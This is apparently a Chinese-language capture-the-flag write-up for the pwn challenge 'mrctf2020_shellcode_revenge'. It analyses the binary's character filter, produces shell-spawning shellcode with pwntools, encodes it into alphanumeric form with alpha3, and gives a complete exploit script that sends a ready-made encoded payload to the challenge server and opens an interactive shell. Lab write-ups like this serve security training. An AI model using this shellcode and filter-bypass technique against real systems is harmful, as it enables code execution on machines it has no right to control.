mrctf2020_shellcode_revenge

mrctf2020_shellcode_revenge

查看保护
mrctf2020_shellcode_revenge_第1张图片
mrctf2020_shellcode_revenge_第2张图片
只能看汇编,那就看一下吧,这个函数意思其实就是输入的长度大于0则中转到11ac。看一下11ac
请添加图片描述
给rbp-4的地方赋值为0,接着进123a
mrctf2020_shellcode_revenge_第3张图片
这个函数其实就是如果输入字符串长度大于0则跳转到11b8,否则call。这里放shellcode
mrctf2020_shellcode_revenge_第4张图片
不在0x60-0x7a跳转
mrctf2020_shellcode_revenge_第5张图片
0x40-0x5a
mrctf2020_shellcode_revenge_第6张图片
0x2f-0x5a
mrctf2020_shellcode_revenge_第7张图片
可以看到当0x60-0x70时不会跳转,0x2f-0x5a时不会跳转,输入shellcode的字符就应该保持在这个范围里即可。这里用到了alpha这个工具。

from pwn import *

context.arch='amd64'

shellcode = asm(shellcraft.sh())

f = open('z.bin', 'wb')

f.write(shellcode)
f.close()

生成一个shellcode到z.bin中,再通过alpha3将shellcode给变成可见字符

git clone https://github.com/TaQini/alpha3.git
python ALPHA3.py x64 ascii mixedcase rax --input='XXXXXXXX/z.bin'

最后exp

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 25335)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

shellcode = 'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'

r.send(shellcode)

r.interactive()

你可能感兴趣的:(pwn)